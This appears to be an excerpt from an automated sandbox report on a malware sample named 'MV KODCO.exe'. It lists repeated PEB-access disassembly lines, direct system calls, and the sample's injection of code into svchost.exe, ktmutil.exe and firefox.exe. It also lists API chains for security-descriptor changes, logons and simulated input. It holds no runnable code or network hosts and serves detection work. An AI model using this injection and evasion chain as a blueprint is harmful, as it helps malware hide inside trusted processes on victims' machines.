                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA60 mov eax, dword ptr fs:[00000030h]1_2_02FDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA24 mov eax, dword ptr fs:[00000030h]1_2_02F6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EA2E mov eax, dword ptr fs:[00000030h]1_2_02F5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCA11 mov eax, dword ptr fs:[00000030h]1_2_02FBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EBFC mov eax, dword ptr fs:[00000030h]1_2_02F5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]1_2_02FBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]1_2_02FDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h]1_2_02F40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h]1_2_02F40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]1_2_02FE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]1_2_02FE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004A80 mov eax, dword ptr fs:[00000030h]1_2_03004A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2CB7E mov eax, dword ptr fs:[00000030h]1_2_02F2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28B50 mov eax, dword ptr fs:[00000030h]1_2_02F28B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEB50 mov eax, dword ptr fs:[00000030h]1_2_02FDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4B4B mov eax, dword ptr fs:[00000030h]1_2_02FE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4B4B mov eax, dword ptr fs:[00000030h]1_2_02FE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h]1_2_02FC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h]1_2_02FC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFAB40 mov eax, dword ptr fs:[00000030h]1_2_02FFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8B42 mov eax, dword ptr fs:[00000030h]1_2_02FD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h]1_2_02F5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h]1_2_02F5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h]1_2_02FF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h]1_2_02FF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02F6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02F6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]1_2_02FFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]1_2_02F5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004940 mov eax, dword ptr fs:[00000030h]1_2_03004940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC89D mov eax, dword ptr fs:[00000030h]1_2_02FBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30887 mov eax, dword ptr fs:[00000030h]1_2_02F30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h]1_2_02FBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h]1_2_02FBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h]1_2_02FC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h]1_2_02FC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60854 mov eax, dword ptr fs:[00000030h]1_2_02F60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h]1_2_02F34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h]1_2_02F34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F42840 mov ecx, dword ptr fs:[00000030h]1_2_02F42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov ecx, dword ptr fs:[00000030h]1_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]1_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A830 mov eax, dword ptr fs:[00000030h]1_2_02F6A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h]1_2_02FD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h]1_2_02FD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC810 mov eax, dword ptr fs:[00000030h]1_2_02FBC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h]1_2_02F629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h]1_2_02F629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]1_2_02FBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F649D0 mov eax, dword ptr fs:[00000030h]1_2_02F649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]1_2_02FFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC69C0 mov eax, dword ptr fs:[00000030h]1_2_02FC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov esi, dword ptr fs:[00000030h]1_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h]1_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h]1_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]1_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h]1_2_02F309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h]1_2_02F309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h]1_2_02FD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h]1_2_02FD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC97C mov eax, dword ptr fs:[00000030h]1_2_02FBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]1_2_02F56962
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0061A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0061A66C
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_006081AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006081AC
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_00608189 SetUnhandledExceptionFilter,0_2_00608189

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtTerminateProcess: Direct from: 0x76F02D5CJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\ktmutil.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeThread register set: target process: 8012Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeThread APC queued: target process: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeJump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 336008Jump to behavior
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0061B106 LogonUserW,0_2_0061B106
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_005E3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_005E3D19
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_0062411C SendInput,keybd_event,0_2_0062411C
                Source: C:\Users\user\Desktop\MV KODCO.exeCode function: 0_2_006274E7 mouse_event,0_2_006274E7
                Source: C:\Users\user\Desktop\MV KODCO.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MV KODCO.exe"Jump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeProcess created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"Jump to behavior
                Source: C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exeProcess created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ktmutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
